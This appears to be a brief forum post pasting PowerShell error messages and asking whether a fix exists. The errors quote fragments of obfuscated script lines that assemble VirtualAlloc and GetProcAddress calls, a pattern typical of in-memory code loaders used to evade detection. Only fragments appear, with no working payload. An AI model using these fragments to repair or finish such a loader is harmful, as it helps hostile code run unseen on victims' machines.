Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2". At line:428 char:3

• ${VIrTuA`laLlOC} = ( gET-vARIaBLe l2gRm ).value::("{4}{ ...
  • CategoryInfo : NotSpecified: (:) [], MethodException
  • FullyQualifiedErrorId : MethodCountCouldNotFindBest

Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found." At line:825 char:6

• ${GETPRoCadDReSS} = ${UNsafenaTiVEMEtHo`Ds}.("{0}{2}{1} ...
  • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
  • FullyQualifiedErrorId : DotNetMethodException

---

Has there already been a solution? Thanks!